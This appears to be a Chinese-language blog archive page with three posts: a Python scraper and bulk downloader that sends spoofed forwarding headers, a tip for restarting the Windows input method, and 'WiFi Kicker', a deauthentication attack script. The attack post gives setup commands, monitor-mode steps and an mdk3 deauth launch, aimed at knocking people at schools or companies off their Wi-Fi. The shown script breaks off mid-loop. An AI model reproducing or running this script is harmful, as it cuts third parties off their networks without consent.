Weil Jimmer's BlogWeil Jimmer's Blog


Month:September 2015

Found 6 records. At Page 1 / 2.

Python 進階下載器

No Comments
-
更新於 2015-11-20 18:47:40

我會寫這個,一來是為了讓朋友羨慕也想學程式,二來是我自己要用。我不會閒閒開發一個我用不到的東西。總是開發者要支持一下自己的產品嘛。

這是用Python3寫成的程式,主要針對手機而使用。需要安裝BeautifulSoup4。

(在Windows下的命令提示字元顯示很醜,沒有顏色,實際上在手機Linux終端機裡面跑的時候,會有顏色。)

主要支援以下功能:

一、抓取目標URL的目標連結

例如我要抓取IG某個頁面的所有圖片。

二、載入網頁列表,抓取目標連結

例如:載入某網站相簿的第一頁,抓取圖片,然後載入第二頁,抓取圖片,載入第三頁……以此類推。

三、規律網址抓取,這個算是最低階的方法吧。

例如:下載http://example.com/1.jpg,下載http://example.com/2.jpg,下載http://example.com/3.jpg,下載/4.jpg下載/5.jpg……

四、顯示目標清單

五、下載清單上的連結

至於抓圖功能,我可以稱進階抓圖器是沒有講假的,雖然還比不上我用VB.NET寫出來的 強大。那種仿一般正常用戶框架又有COOKIE、HEADER、還解析JS,Python很難辦得到。

所以,頂多次級一點。

支援:

一、抓取頁面上所有「看起來是網址」的連結。(即便它沒有被鑲入在任何標籤內)(採用正規表達式偵測)

二、抓取A標籤的屬性HREF。(超連結)

三、抓取IMG標籤的屬性SRC。(圖片)

四、抓取SOURCE標籤的屬性SRC。(HTML5的audio、movie)

五、抓取EMBED標籤的SRC屬性。(FLASH)

六、抓取OBJECT標籤的DATA屬性。(網頁插件)

七、LINK標籤的HREF屬性。(CSS)

八、SCRIPT標籤的SRC屬性。(JS)

九、FRAME標籤的SRC屬性。(框架)

十、IFRAME標籤的SRC屬性。(內置框架)

十一、以上全部。

十二、自訂抓取標籤名稱與屬性名稱。(這個我VB板的進階抓圖器沒有這項功能)

支援 過濾關鍵字,包刮AND、OR邏輯閘,一定要全部包刮關鍵字,或是命中其一關鍵字。

規律網址下載則支援,起始數字、終止數字、每次遞增多少、補位多少。

※這個有相對位置的處理。

****************************************

* 名稱:進階下載器

* 團隊:White Birch Forum Team

* 作者:Weil Jimmer

* 網站:http://0000.twgogo.org/

* 時間:2015.09.26

****************************************

Source Code

# coding: utf-8
"""Weil Jimmer For Safe Test Only"""
import os,urllib.request,shutil,sys,re
from threading import Thread
from time import sleep
from sys import platform as _platform

GRAY = "\033[1;30m"
RED = "\033[1;31m"
LIME = "\033[1;32m"
YELLOW = "\033[1;33m"
BLUE = "\033[1;34m"
MAGENTA = "\033[1;35m"
CYAN = "\033[1;36m"
WHITE = "\033[1;37m"
BGRAY = "\033[1;47m"
BRED = "\033[1;41m"
BLIME = "\033[1;42m"
BYELLOW = "\033[1;43m"
BBLUE = "\033[1;44m"
BMAGENTA = "\033[1;45m"
BCYAN = "\033[1;46m"
BDARK_RED = "\033[1;48m"
UNDERLINE = "\033[4m"
END = "\033[0m"

if _platform.find("linux")<0:
	GRAY = ""
	RED = ""
	LIME = ""
	YELLOW = ""
	BLUE = ""
	MAGENTA = ""
	CYAN = ""
	WHITE = ""
	BGRAY = ""
	BRED = ""
	BLIME = ""
	BYELLOW = ""
	BBLUE = ""
	BMAGENTA = ""
	BCYAN = ""
	UNDERLINE = ""
	END = ""
	os.system("color e")

try:
    import pip
except:
	print(RED + "錯誤沒有安裝pip!" + END)
	input()
	exit()

try:
    from bs4 import BeautifulSoup
except:
	print(RED + "錯誤沒有安裝bs4!嘗試安裝中...!" + END)
	pip.main(["install","beautifulsoup4"])
	from bs4 import BeautifulSoup

global phone_
phone_ = False

try:
	import android
	droid = android.Android()
	phone_ = True
except:
	try:
		import clipboard
	except:
		print(RED + "錯誤沒有安裝clipboard!嘗試安裝中...!" + END)
		pip.main(["install","PyGTK"])
		pip.main(["install","clipboard"])
		import clipboard

def get_clipboard():
	global phone_
	if phone_==True:
		return str(droid.getClipboard().result)
	else:
		return clipboard.paste()

global target_url
target_url = [[],[],[],[],[],[],[],[],[]]

def __init__(self):
	print("")

print (RED)
print ("*" * 40)
print ("*  Name:\tWeil_Advanced_Downloader")
print ("*  Team:" + LIME + "\tWhite Birch Forum Team" + RED)
print ("*  Developer:\tWeil Jimmer")
print ("*  Website:\thttp://0000.twgogo.org/")
print ("*  Date:\t2015.10.09")
print ("*" * 40)
print (END)

root_dir = "/sdcard/"
print("根目錄:" + root_dir)
global save_temp_dir
global save_dir
save_dir=str(input("存檔資料夾:"))
save_temp_dir=str(input("暫存檔資料夾(會自動刪除):"))

global target_array_index
target_array_index = 0

def int_s(k):
	try:
		return int(k)
	except:
		return -1

def reporthook(blocknum, blocksize, totalsize):
	readsofar = blocknum * blocksize
	if totalsize > 0:
		percent = readsofar * 1e2 / totalsize
		s = "\r%5.1f%% %*d / %d bytes" % (percent, len(str(totalsize)), readsofar, totalsize)
		sys.stderr.write(s)
		if readsofar >= totalsize:
			sys.stderr.write("\r" + MAGENTA + "%5.1f%% %*d / %d bytes" % (100, len(str(totalsize)), totalsize, totalsize))
	else:
		sys.stderr.write("\r未知檔案大小…下載中…" + str(readsofar) + " bytes")
		#sys.stderr.write("read %d\n" % (readsofar,))

def url_encode(url_):
	if url_.startswith("http://"):
		return 'http://' + urllib.parse.quote(url_[7:])
	elif url_.startswith("https://"):
		return 'https://' + urllib.parse.quote(url_[8:])
	elif url_.startswith("ftp://"):
		return 'ftp://' + urllib.parse.quote(url_[6:])
	elif ((not url_.startswith("ftp://")) and (not url_.startswith("http"))):
		return 'http://' + urllib.parse.quote(url_)
	return url_

def url_correct(url_):
	if ((not url_.startswith("ftp://")) and (not url_.startswith("http"))):
		return 'http://' + (url_)
	return url_

def download_URL(url,dir_name,ix,total,encode,return_yes_no):
	global save_temp_dir
	prog_str = "(" + str(ix) + "/" + str(total) + ")"
	if (total==0):
		prog_str=""
	file_name = url.split('/')[-1]
	file_name=file_name.replace(":","").replace("*","").replace('"',"").replace("\\","").replace("|","").replace("?","").replace("<","").replace(">","")
	if file_name=="":
		file_name="NULL"
	try:
		print(YELLOW + "下載中…" + prog_str + "\n" + url + "\n" + END)
		if not os.path.exists(root_dir + dir_name + "/") :
			os.makedirs(root_dir + dir_name + "/")
		opener = urllib.request.FancyURLopener({})
		opener.version = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
		opener.addheader("Referer", url)
		opener.addheader("X-Forwarded-For", "0.0.0.0")
		opener.addheader("Client-IP", "0.0.0.0")
		local_file,response_header=opener.retrieve(url_encode(url), root_dir + dir_name + "/" + str(ix) + "-" + file_name, reporthook)
		print(MAGENTA + "下載完成" + prog_str + "!" + END)
	except urllib.error.HTTPError as ex:
		print(RED + "下載失敗" + prog_str + "!" + str(ex.code) + END)
	except:
		print(RED + "下載失敗" + prog_str + "!未知錯誤!" + END)
	if return_yes_no==0:
		return ""
	try:
		k=open(local_file,encoding=encode).read()
	except:
		k="ERROR"
		print(RED + "讀取失敗!" + END)
	try:
		if dir_name==save_temp_dir:
			shutil.rmtree(root_dir + save_temp_dir + "/")
	except:
		print(RED + "刪除暫存資料夾失敗!" + END)
	return k

def check_in_filter(url_array,and_or,keyword_str):
	if keyword_str=="":
		return url_array
	url_filter_array = []
	s = keyword_str.split(',')
	for array_x in url_array:
		ok = True
		for keyword_ in s:
			if str(array_x).find(keyword_)>=0:
				if and_or==0:
					url_filter_array.append(array_x)
					ok=False
					break
			else:
				if and_or==1:
					ok=False
					break
		if ok==True:
			url_filter_array.append(array_x)
	return url_filter_array

def handle_relative_url(handle_url,ori_url):
	handle_url=str(handle_url)
	if handle_url=="":
		return ori_url
	if handle_url.startswith("?"):
		temp_form_url = ori_url
		search_A = ori_url.find("?")
		if search_A<0:
			return ori_url + handle_url
		else:
			return ori_url[0:search_A] + handle_url
	if handle_url.startswith("//"):
		return "http:" + handle_url
	if (handle_url.startswith("http://") or handle_url.startswith("https://") or handle_url.startswith("ftp://")):
		return handle_url
	root_url = ori_url
	search_ = root_url.find("//")
	if search_<0:
		return handle_url
	search_x = root_url.find("/", search_+2);
	if (search_x<0):
		root_url = ori_url
	else:
		root_url = ori_url[0:search_x]
	same_dir_url = ori_url[search_+2:]
	search_x2 = same_dir_url.rfind("/")
	if search_x2<0:
		same_dir_url = ori_url
	else:
		same_dir_url = ori_url[0:search_x2+search_+2]
	if handle_url.startswith("/"):
		return (root_url + handle_url)
	if handle_url.startswith("./"):
		return (same_dir_url + handle_url[1:])
	return (same_dir_url + "/" + handle_url)

def remove_duplicates(values):
	output = []
	seen = set()
	for value in values:
		if value not in seen:
			output.append(value)
			seen.add(value)
	return output

def get_text_url(file_content):
	url_return_array = re.findall('(http|https|ftp)://([\w+?\.\w+])+([a-zA-Z0-9\~\!\@\#\$\%\^\&amp;\*\(\)_\-\=\+\\\/\?\.\:\;\'\,]*)?', file_content)
	return url_return_array

def get_url_by_tagname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetid_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(id=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(name=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,ctagename,cattribute):
	global target_url
	if (way_X==1):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_text_url(html_code)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==2):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"a","href",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==3):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"img","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==4):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"source","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==5):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"embed","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==6):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"object","data",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==7):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"link","href",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==8):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"script","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==9):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"frame","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==10):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"iframe","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==11):
		ori_size=len(target_url[target_array_index])
		get_array_1 = get_text_url(html_code)
		get_array_2 = get_url_by_tagname_attribute(html_code,"a","href",temp_url)
		get_array_3 = get_url_by_tagname_attribute(html_code,"img","src",temp_url)
		get_array_4 = get_url_by_tagname_attribute(html_code,"source","src",temp_url)
		get_array_5 = get_url_by_tagname_attribute(html_code,"embed","src",temp_url)
		get_array_6 = get_url_by_tagname_attribute(html_code,"object","data",temp_url)
		get_array_7 = get_url_by_tagname_attribute(html_code,"link","href",temp_url)
		get_array_8 = get_url_by_tagname_attribute(html_code,"script","src",temp_url)
		get_array_9 = get_url_by_tagname_attribute(html_code,"frame","src",temp_url)
		get_array_10 = get_url_by_tagname_attribute(html_code,"iframe","src",temp_url)
		target_url[target_array_index].extend(get_array_1)
		target_url[target_array_index].extend(get_array_2)
		target_url[target_array_index].extend(get_array_3)
		target_url[target_array_index].extend(get_array_4)
		target_url[target_array_index].extend(get_array_5)
		target_url[target_array_index].extend(get_array_6)
		target_url[target_array_index].extend(get_array_7)
		target_url[target_array_index].extend(get_array_8)
		target_url[target_array_index].extend(get_array_9)
		target_url[target_array_index].extend(get_array_10)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==12):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_tagname_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==13):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_targetid_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==14):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_targetname_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)

while True:	
	while True:
		method_X=int_s(input("\n\n" + CYAN + "要執行的動作:\n(1)抓取目標網頁資料\n(2)載入網址列表抓取資料\n(3)規律網址抓取\n(4)顯示目前清單\n(5)下載目標清單\n(6)清空目標清單\n(7)複製清單\n(8)刪除目標清單的特定值\n(9)從剪貼簿貼上網址(每個一行)" + END + "\n\n"))
		if method_X<=9 and method_X>=1:
			break
		else:
			print("輸入有誤!\n\n")
	if (method_X==1):
		while True:
			target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if target_array_index<=8 and target_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
			way_X=int_s(input("\n\n" + CYAN + "抓取方式:\n(1)搜尋頁面所有純文字網址\n(2)抓取所有A標籤HREF屬性\n(3)抓取所有IMG標籤SRC屬性\n(4)抓取所有SOURCE標籤SRC屬性\n(5)抓取所有EMBED標籤SRC屬性\n(6)抓取所有OBJECT標籤DATA屬性\n(7)抓取所有LINK標籤HREF屬性\n(8)抓取所有SCRIPT標籤SRC屬性\n(9)抓取所有FRAME標籤SRC屬性\n(10)抓取所有IFRAME標籤SRC屬性\n(11)使用以上所有方法\n(12)自訂找尋標籤名及屬性名\n(13)自訂找尋ID及屬性名\n(14)自訂找尋Name及屬性名" + END + "\n\n"))
			if way_X<=14 and way_X>=1:
				break
		else:
			print("輸入有誤!")
		if way_X==12 or way_X==13 or way_X==14:	
			target_tagname_=str(input("\n目標標籤名稱/ID/Name:"))
			target_attribute_=str(input("\n目標屬性名稱:"))
		else:
			target_tagname_=""
			target_attribute_=""
		temp_url=url_correct(str(input("\n目標網頁URL:")))
		temp_url_code=str(input("\n目標網頁編碼(請輸入utf-8或big5或gbk…):"))
		keywords=str(input("\n" + CYAN + "請輸入過濾關鍵字(可留空,可多個,逗號為分隔符號):" + END + "\n\n"))
		and_or=0
		if keywords!="":
			while True:
				and_or=(-1)
				try:
					and_or=int_s(input("\n" + CYAN + "請輸入關鍵字邏輯閘:(1=and、0=or)" + END + "\n\n"))
				except:
					print("")
				if and_or==0 or and_or==1:
					break
				else:
					print("輸入有誤!\n")
		html_code=download_URL(temp_url,save_temp_dir,0,0,temp_url_code,1)
		if html_code=="ERROR":
			continue
		run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...");
	elif(method_X==2):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「載入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
			target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if target_array_index<=8 and target_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
			way_X=int_s(input("\n\n" + CYAN + "抓取方式:\n(1)搜尋頁面所有純文字網址\n(2)抓取所有A標籤HREF屬性\n(3)抓取所有IMG標籤SRC屬性\n(4)抓取所有SOURCE標籤SRC屬性\n(5)抓取所有EMBED標籤SRC屬性\n(6)抓取所有OBJECT標籤DATA屬性\n(7)抓取所有LINK標籤HREF屬性\n(8)抓取所有SCRIPT標籤SRC屬性\n(9)抓取所有FRAME標籤SRC屬性\n(10)抓取所有IFRAME標籤SRC屬性\n(11)使用以上所有方法\n(12)自訂找尋標籤名及屬性名\n(13)自訂找尋ID及屬性名\n(14)自訂找尋Name及屬性名" + END + "\n\n"))
			if way_X<=14 and way_X>=1:
				break
		else:
			print("輸入有誤!")
		if way_X==12 or way_X==13 or way_X==14:
			target_tagname_=str(input("\n目標標籤名稱/ID/Name:"))
			target_attribute_=str(input("\n目標屬性名稱:"))
		else:
			target_tagname_=""
			target_attribute_=""
		keywords=str(input("\n" + CYAN + "請輸入過濾關鍵字(可留空,可多個,逗號為分隔符號):" + END + "\n\n"))
		while True:
			and_or=int_s(input("\n" + CYAN + "請輸入關鍵字邏輯閘:(1=and、0=or)" + END + "\n\n"))
			if and_or==0 or and_or==1:
				break
			else:
				print("輸入有誤!\n\n")
		temp_url_code=str(input("\n集合的網頁編碼(請輸入utf-8或big5或gbk…):"))
		for x in range(0,(len(target_url[RUN_array_index]))):
			html_code=download_URL(str(target_url[RUN_array_index][x]),save_temp_dir,(x+1),len(target_url[RUN_array_index]),temp_url_code,1)
			if html_code=="ERROR":
				continue
			run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...");
	elif(method_X==3):
		start_number=int_s(input("起始點(數字):"))
		end_number=int_s(input("終止點(數字):"))
		step_ADD=int_s(input("每次遞增多少:"))
		str_padx=int_s(input("補滿位數至:"))
		if not os.path.exists('/sdcard/' + save_dir) :
			os.makedirs('/sdcard/' + save_dir )
		print(LIME + "※檔案將存在/sdcard/" + save_dir + "資料夾。" + END)
		while True:
			url=url_correct(input(LIME + "目標URL({i}是遞增數):" + END))
			if url.find("{i}")>=0:
				break
			else:
				print("網址未包含遞增數,請重新輸入網址。")
		for x in range(start_number,(end_number+1),step_ADD):
			download_URL(url.replace("{i}",str(x).zfill(str_padx)),save_dir,x,(end_number),"utf-8",0)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==4):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「顯示」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		for x in range(0,(len(target_url[RUN_array_index]))):
			print("URL (" + str(x+1) + "/" + str(len(target_url[RUN_array_index])) + "):" + str(target_url[RUN_array_index][x]))
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==5):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「下載」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		for x in range(0,(len(target_url[RUN_array_index]))):
			download_URL(str(target_url[RUN_array_index][x]),save_dir,(x+1),len(target_url[RUN_array_index]),"utf-8",0)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==6):
		ver = str(input("\n\n" + RED + "確定清空目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「清空」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			target_url[RUN_array_index]=[]
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==7):
		ver = str(input("\n\n" + RED + "確定複製目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「複製」的來源清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			while True:
				target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if target_array_index<=8 and target_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			target_url[target_array_index]=target_url[RUN_array_index]
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==8):
		ver = str(input("\n\n" + RED + "確定刪除目標清單特定值?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「刪除值」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			if len(target_url[RUN_array_index])!=0:
				while True:
					target_array_index=int_s(input("\n\n" + CYAN + "您要「刪除的值編號」:(請輸入編號0~" + str(len(target_url[RUN_array_index])-1) + ")" + END + "\n\n"))
					if target_array_index>=0 and target_array_index<=(len(target_url[RUN_array_index])-1):
						break
					else:
						print("輸入有誤!請輸入0~" + str(len(target_url[RUN_array_index])-1) + "之間的號碼!")
				del target_url[RUN_array_index][target_array_index]
			else:
				print("空清單!無任何值!故無法刪除。")
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==9):
		ver = str(input("\n\n" + RED + "確定從剪貼簿貼上目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if target_array_index<=8 and target_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			kk=get_clipboard()
			if kk=="" or kk==None:
				print(RED + "剪貼簿是空的!" + END)
			else:
				ori_size=len(target_url[target_array_index])
				target_url[target_array_index].extend(kk.split("\n"))
				target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
				print(LIME + "已添加進去 " + str(len(target_url[target_array_index])-ori_size) + " 個不重複的URL。" + END)
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
input("\n\n請輸入ENTER鍵結束...")

 


This entry was posted in General, Experience, Free, Functions, Note, Product, Python By Weil Jimmer.

IME無法啟動解決方法

No Comments
-
發布於 2015-09-26 14:13:00

如圖,如果說切換到 非打字欄位出現這畫面很正常,但反之,若切換到可輸入資料的欄位卻無法正常顯示,可以先嘗試使用 Ctrl + Space (空白鍵)。若依舊無法啟動,表示此程式可能已關閉/崩潰。

Try:Ctrl + R,輸入 「C:\Windows\system32\ctfmon.exe」按下Enter。輸入法就應該會回來了。


This entry was posted in General, Experience, Functions By Weil Jimmer.

WiFi_Kicker.py DeAuth 攻擊

No Comments
-
更新於 2015-09-20 12:02:18

今天實在太過閒,其實也不閒,只是不想花時間讀書,一想到就厭煩。於是就用Python寫了個小程式當作練習。

WiFi Kicker,看名稱就知道大概是讓別人斷線的程式。

主要功能:選擇性DOS目標,自訂目標SSID(有些地方有很多個相同名稱,但實際上都是不同的基地台,例如學校、公司…等)、自訂訊號強度(舉例:訊號強度要大於-70dbm才DeAuth DOS攻擊)、自訂間隔時間。

首先…因為我初學,所以程式設計得不是很好。必須要有兩張網卡,wlan0,wlan1,

而wlan1必須要支援mon模式。

必要組件:aircrack、mdk3、python wifi lib。

apt-get install python-pip
apt-get install aircrack-ng
apt-get install mdk3
pip install wifi

這主要是針對我自己的平板所寫的,桌面環境為LXDE。指令裡面有寫到 lxterminal 這個應用程式,所以可能要自己修改一下。

開發緣由:我自己的AR9271這網卡在某些場所搜尋的裝置實在太多了!如果開了 mdk3 根本Dos不到什麼東西。反而自己的網卡Down了。所以我自己寫了一個根據訊號強度和目標裝置SSID,特定目標DOS會比較有效一點。

wifi_kicker.py - Source Code

# coding: utf-8
"""By Weil Jimmer - For Safe Test Only"""
from wifi import Cell, Scheme
import time,os,subprocess

def __init__(self):
	print("")

class wcolors:
	GRAY = "\033[1;30m"
	RED = "\033[1;31m"
	LIME = "\033[1;32m"
	YELLOW = "\033[1;33m"
	BLUE = "\033[1;34m"
	MAGENTA = "\033[1;35m"
	CYAN = "\033[1;36m"
	WHITE = "\033[1;37m"
	DARK_RED = "\033[1;38m"
	BGRAY = "\033[1;47m"
	BRED = "\033[1;41m"
	BLIME = "\033[1;42m"
	BYELLOW = "\033[1;43m"
	BBLUE = "\033[1;44m"
	BMAGENTA = "\033[1;45m"
	BCYAN = "\033[1;46m"
	BDARK_RED = "\033[1;48m"
	BOLD = "\033[1m"
	UNDERLINE = "\033[4m"
	END = "\033[1;m"
	END_BOLD = "\033[1m"

print ("\033[1;31;40m")
print ("*" * 40)
print ("*  ")
print ("*  Name:\t" + wcolors.BOLD + "WiFi Ass Kicker" + wcolors.END_BOLD)
print ("*  ")
print ("*  Team:\tWhite Birch Forum Team")
print ("*  ")
print ("*  Website:\thttp://0000.twgogo.org/")
print ("*  ")
print ("*  Date:\t2015.09.20")
print ("*  ")
print ("*" * 40)
print ("\033[0m")

target_singal_limit = int(raw_input("目標訊號強度(請加負號):"))
target_ssid = str(raw_input("目標SSID(選填,可留空):"))
time_X = int(raw_input("間隔秒數:"))

if time_X<=0:
	time_X=10

os.system("ifconfig wlan1 up")
time.sleep(2)
print("wlan1 UP..")
os.system("airmon-ng start wlan1")
time.sleep(2)
print("wlan1mon UP..")

os.system("lxterminal -e 'bash -c \"airodump-ng wlan1mon; exec bash\"'")
os.system("lxterminal -e 'bash -c \"mdk3 wlan1mon d -b black_list.txt -s 1024; exec bash\"'")
try:
	while True:
		try:
			target_mac=[]
			print(wcolors.RED + "Scanning..." + wcolors.END)
			k=Cell.all('wlan0')
			print(wcolors.RED + "Scan Done." + wcolors.END) 
